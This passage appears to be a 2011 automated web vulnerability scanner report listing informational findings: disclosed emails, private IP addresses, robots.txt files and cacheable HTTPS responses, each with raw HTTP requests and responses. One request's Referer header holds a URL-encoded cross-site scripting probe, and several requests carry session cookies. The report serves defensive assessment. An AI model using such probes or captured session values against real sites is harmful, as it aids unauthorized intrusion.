Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:42 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=85
Content-Length: 29374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.224. http://www.veoh.com/video/flag/permalinkId/v18978294NGnK88j8  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /video/flag/permalinkId/v18978294NGnK88j8

Issue detail

The following email address was disclosed in the response:

Request

GET /video/flag/permalinkId/v18978294NGnK88j8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:46 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=94
Content-Length: 32245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.225. http://www.veoh.com/video/share/permalinkId/v18978294NGnK88j8  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /video/share/permalinkId/v18978294NGnK88j8

Issue detail

The following email address was disclosed in the response:

Request

GET /video/share/permalinkId/v18978294NGnK88j8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:42 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=76
Content-Length: 31809

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.226. http://www.w3.org/TR/html4/loose.dtd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.w3.org
Path:   /TR/html4/loose.dtd

Issue detail

The following email addresses were disclosed in the response:

Request

GET /TR/html4/loose.dtd HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:31:10 GMT
Server: Apache/2
Content-Location: loose.dtd.raw
Vary: negotiate,accept-encoding,User-Agent
TCN: choice
Last-Modified: Fri, 24 Dec 1999 23:37:48 GMT
ETag: "b17a-35c741aef8b00;475d1b7cb20c0"
Accept-Ranges: bytes
Content-Length: 45434
Cache-Control: max-age=7776000
Expires: Wed, 04 May 2011 20:31:10 GMT
P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml"
Connection: close
Content-Type: text/plain

<!--
This is the HTML 4.01 Transitional DTD, which includes
presentation attributes and elements that W3C expects to phase out
as support for style sheets matures. Authors should use the S
...[SNIP]...
<dsr@w3.org>
...[SNIP]...
<lehors@w3.org>
...[SNIP]...
<ij@w3.org>
...[SNIP]...

23.227. http://www.waspbarcode.com/scanners/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.waspbarcode.com
Path:   /scanners/

Issue detail

The following email address was disclosed in the response:

Request

GET /scanners/ HTTP/1.1
Host: www.waspbarcode.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 20:34:56 GMT
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "administrator@waspbarcode.com" on "2007.06.04T10:29-0500" exp "2011.06.04T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "administrator@waspbarcode.com" on "2007.06.04T10:29-0500" exp "2011.06.04T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "administrator@waspbarcode.com" on "2007.06.04T10:29-0500" exp "2011.06.04T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "administrator@waspbarcode.com" on "2007.06.04T10:29-0500" exp "2011.06.04T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "administrator@waspbarcode.com" on "2007.06.04T10:29-0500" exp "2011.06.04T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "administrator@waspbarcode.com" on "2007.06.04T10:29-0500" exp "2011.06.04T12:00-0500" r (l 0 s 0 v 0 o 0))
X-Powered-By: ASP.NET
Content-Length: 60930
Content-Type: text/html
Set-Cookie: Pop=Set=True; expires=Fri, 04-Feb-2011 20:34:56 GMT; path=/
Set-Cookie: WASP=firsttime=true&source=&originalid=411392716&sessionid=411392716; expires=Fri, 03-Feb-2012 20:34:56 GMT; path=/
Set-Cookie: ASPSESSIONIDCQBSCDRC=MMKFFIIBGDMFFEBNGPKMKPJL; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">

   <head>
       <title>Barcode Scanners - Laser &amp; Wireless by Wasp Barcode Technologies</
...[SNIP]...

24. Private IP addresses disclosed  previous  next
There are 5 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


24.1. http://cdn.gigya.com/JS/gigya.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.gigya.com
Path:   /JS/gigya.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /JS/gigya.js?services=socialize HTTP/1.1
Host: cdn.gigya.com
Proxy-Connection: keep-alive
Referer: http://abc.go.com/vp2/d/deeplinkbf5ec--%3E%3Cscript%3Ealert(1)%3C/script%3Edb1ccd44039
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-Modified-Since: Wed, 12 Jan 2011 12:06:06 GMT

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Last-Modified: Wed, 12 Jan 2011 12:06:06 GMT
Server: Microsoft-IIS/6.0
x-server: web103
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Cache-Control: public, max-age=900
Date: Fri, 04 Feb 2011 02:02:16 GMT
Connection: close
Content-Length: 98961

//server injected code
if (typeof gigya == 'undefined') {gigya = new Object();}
gigya.build={version:'2.10.1',time:'Wed 01/12/2011 14:06:06.34 '};
if (typeof gigya.partnerSettings == 'undefined')
...[SNIP]...
s[iScript].src.toLowerCase().indexOf("//cdn.gigya.com")>-1)||(gigya._vars.scripts[iScript].src.toLowerCase().indexOf("//cdns.gigya.com")>-1)||(gigya._vars.scripts[iScript].src.toLowerCase().indexOf("//192.168.10.24")>
...[SNIP]...

24.2. http://digg.com/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /submit?url=http%3A%2F%2Fwww.veoh.com%2Fbrowse%2Fvideos%2Fcategory%2Faction_adventure%2Fwatch%2Fv18978294NGnK88j8&title=Magadheera+SmartDesis.TK.mp4&bodytext=action&media=video&topic=movies HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:06:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1458898097449992448%3A180; expires=Fri, 04-Feb-2011 22:06:01 GMT; path=/; domain=digg.com
Set-Cookie: d=54e4a28f852dd9430bb81e5749041f841a02a7d84540fb9d52a4a7781b876e52; expires=Wed, 03-Feb-2021 08:13:41 GMT; path=/; domain=.digg.com
X-Digg-Time: D=28261 10.2.128.186
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 3360

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg Mobile
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, p
...[SNIP]...
<span title="10.2.128.186 Build: 198 - Wed Feb 2 16:30:12 PST 2011">
...[SNIP]...

24.3. http://digg.com/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /submit?phase=2&url=http://ir.supermedia.com/index.cfm? HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:35:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1168415921484595456%3A180; expires=Fri, 04-Feb-2011 19:35:44 GMT; path=/; domain=digg.com
Set-Cookie: d=9a81d04bc71053ddb307d64c049af82a3be90be8ba862b2a52714e2e4b2b499b; expires=Wed, 03-Feb-2021 05:43:24 GMT; path=/; domain=.digg.com
X-Digg-Time: D=33479 10.2.129.81
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7667

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
<span title="10.2.129.81 Build: 198 - Wed Feb 2 16:30:12 PST 2011">
...[SNIP]...

24.4. http://digg.com/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:35:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1168415921484595456%3A180; expires=Fri, 04-Feb-2011 19:35:44 GMT; path=/; domain=digg.com
Set-Cookie: d=0ff09a9ff26d23c27385462bc99e308f35991a0289651f6a22602a6a428198db; expires=Wed, 03-Feb-2021 05:43:24 GMT; path=/; domain=.digg.com
X-Digg-Time: D=21532 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7633

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
<span title="10.2.129.225 Build: 198 - Wed Feb 2 16:30:12 PST 2011">
...[SNIP]...

24.5. http://download.cnet.com/SmartDraw-2010/3000-2075_4-10002466.html/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /SmartDraw-2010/3000-2075_4-10002466.html/x22

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /SmartDraw-2010/3000-2075_4-10002466.html/x22 HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:32:15 GMT
Server: Apache/2.2
Vary: User-Agent,Host
Accept-Ranges: bytes
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Keep-Alive: timeout=15, max=920
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 23096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
<!-- Vader loves you -->
<head>

...[SNIP]...
Id: '4',
assetId: ' ',
pageNumber: '',
channelId: '',
editionId: '3',
brandId: '6',
breadcrumb: ' ',
userIP: '10.16.180.54',
guid: ''
});
       
</script>
...[SNIP]...

25. Credit card numbers disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://manuals.info.apple.com
Path:   /en_US/iPad_User_Guide.pdf

Issue detail

The following credit card number was disclosed in the response:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

Request

GET /en_US/iPad_User_Guide.pdf HTTP/1.1
Host: manuals.info.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.33 (Darwin) mod_ssl/2.8.24 OpenSSL/0.9.7l PHP/5.2.4 DAV/1.0.3 mod_jk/1.2.28
X-Powered-By: PHP/5.2.4
Content-Length: 20108335
Last-Modified: Wed, 22 Dec 2010 17:18:51 GMT
Content-Type: application/pdf
Date: Thu, 03 Feb 2011 17:52:33 GMT
Connection: close

%PDF-1.6%....
10934 0 obj<</Linearized 1/L 20108335/O 10938/E 78252/N 154/T 19889610/H [ 7284 15112]>>endobj xref10934 3420000000016 00000 n
0000022702 00000 n
0000023001 00000 n
000002306
...[SNIP]...
</Subtype/TrueType/FontDescriptor 10942 0 R/LastChar 99/Widths[571 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 439]/BaseFont/WUVWZZ+MyriadSet-Semibold/FirstChar 67/Encoding/WinAnsiEncoding/Type/Font>
...[SNIP]...

26. Robots.txt file  previous  next
There are 12 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.


26.1. http://a.abc.com/service/gremlin/css/files/register-loader,abc-community.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.abc.com
Path:   /service/gremlin/css/files/register-loader,abc-community.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.abc.com

Response

HTTP/1.0 200 OK
Content-Length: 25
Content-Type: text/plain; charset=iso-8859-1
Last-Modified: Fri, 04 Feb 2011 01:44:01 GMT
Accept-Ranges: bytes
ETag: "80462dffcc4cb1:5838"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed02
X-Powered-By: ASP.NET
Cache-Expires: Fri, 04 Feb 2011 01:53:36 GMT
X-UA-Compatible: IE=EmulateIE7
Cache-Control: max-age=286
Date: Fri, 04 Feb 2011 02:02:28 GMT
Connection: close

User-agent: *
Disallow: /

26.2. http://ads.gmodules.com/gadgets/ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.gmodules.com
Path:   /gadgets/ifr

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.gmodules.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Tue, 01 Feb 2011 22:56:20 GMT
Date: Fri, 04 Feb 2011 17:54:51 GMT
Expires: Fri, 04 Feb 2011 17:54:51 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

26.3. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1030885431/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/viewthroughconversion/1030885431/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Thu, 03 Feb 2011 19:16:26 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

26.4. http://ll.static.abc.com/m/vp/prod/images/nav/navbg.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ll.static.abc.com
Path:   /m/vp/prod/images/nav/navbg.png

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ll.static.abc.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=150
Content-Length: 103
Content-Type: text/plain
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc03
Cache-Expires: Mon, 31 Jan 2011 09:41:39 GMT
X-UA-Compatible: IE=EmulateIE7
Date: Fri, 04 Feb 2011 01:59:12 GMT
Last-Modified: Fri, 21 Nov 2008 00:07:50 GMT
Expires: Fri, 04 Feb 2011 02:01:42 GMT
Connection: close

User-agent: *
Disallow: /

User-agent: msnbot-media
Allow: /

User-agent: googlebot
Allow: /


26.5. http://store.apple.com/us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: store.apple.com

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:47:31 GMT
Server: Apache/1.3.41-ps_webdav_01 (Darwin)
Last-Modified: Thu, 18 Nov 2010 07:08:51 GMT
ETag: "9390-29f8-4ce4d103"
Accept-Ranges: bytes
Content-Length: 10744
Keep-Alive: timeout=360, max=99996
Connection: Keep-Alive
Content-Type: text/plain

#########################################################################
# D O N O T E D I T T H I S L O C A L L Y !
#########################################################################

...[SNIP]...

26.6. https://store.apple.com/Apple/WebObjects/OrderStatus.woa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.apple.com
Path:   /Apple/WebObjects/OrderStatus.woa

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: store.apple.com

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 18 Nov 2010 07:08:51 GMT
content-type: text/plain
Date: Thu, 03 Feb 2011 17:49:30 GMT
x-request-id: 0bf41317-86a8-41ed-95fd-dae14db9e994
Content-Length: 10744
ETag: "266d0-29f8-4ce4d103"
Accept-Ranges: bytes
Connection: keep-alive

#########################################################################
# D O N O T E D I T T H I S L O C A L L Y !
#########################################################################

...[SNIP]...

26.7. http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s07964217748958  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://superpages.122.2o7.net
Path:   /b/ss/superpagesadvert/1/H.14/s07964217748958

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: superpages.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:17:34 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "3a02e-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www16
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.8. http://uat.netmng.com/pixel/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://uat.netmng.com
Path:   /pixel/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: uat.netmng.com

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:10:56 GMT
Server: Apache/2.2.9
Last-Modified: Tue, 06 Apr 2010 14:04:58 GMT
ETag: "ac125-1a-48391ee477680"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

26.9. http://www.apple.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apple.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.apple.com

Response

HTTP/1.0 200 OK
Last-Modified: Tue, 06 Jan 1998 23:24:02 GMT
ETag: "41-3241c557be880"
Server: Apache/2.2.11 (Unix)
X-Cache-TTL: 600
X-Cached-Time: Wed, 19 Jan 2011 18:52:51 GMT
Content-Type: text/plain; charset=utf-8
Cteonnt-length: 65
Cache-Control: max-age=111
Expires: Thu, 03 Feb 2011 17:49:22 GMT
Date: Thu, 03 Feb 2011 17:47:31 GMT
Content-Length: 65
Connection: close

# robots.txt for http://www.apple.com/
User-agent: *
Disallow:


26.10. http://www.googleadservices.com/pagead/conversion/1030885431/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1030885431/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Tue, 01 Feb 2011 22:56:20 GMT
Date: Thu, 03 Feb 2011 19:16:20 GMT
Expires: Thu, 03 Feb 2011 19:16:20 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

26.11. http://www.supermedia.com/support/contact-us/company  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /support/contact-us/company

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.supermedia.com

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:17:38 GMT
Content-length: 223
Content-type: text/plain
Last-modified: Thu, 07 Jan 2010 20:46:20 GMT
Accept-ranges: bytes
Connection: close
Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139e45525d5f4f58455e445a4a423660;path=/

User-agent: *
Disallow: /images/
Disallow: /spweb/
Disallow: /jsp/
Disallow: /spportal/
Disallow: /landingpages.do
Disallow: /index.jsp
Disallow: /splisting.do
Disallow: /*?

Sitemap: http://www.super
...[SNIP]...

26.12. https://www.supermedia.com/spportal/style/form.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/style/form.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.supermedia.com

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:05:18 GMT
Content-length: 223
Content-type: text/plain
Last-modified: Thu, 07 Jan 2010 20:46:20 GMT
Accept-ranges: bytes
Connection: close
Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a42378b;path=/

User-agent: *
Disallow: /images/
Disallow: /spweb/
Disallow: /jsp/
Disallow: /spportal/
Disallow: /landingpages.do
Disallow: /index.jsp
Disallow: /splisting.do
Disallow: /*?

Sitemap: http://www.super
...[SNIP]...

27. Cacheable HTTPS response  previous  next
There are 111 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


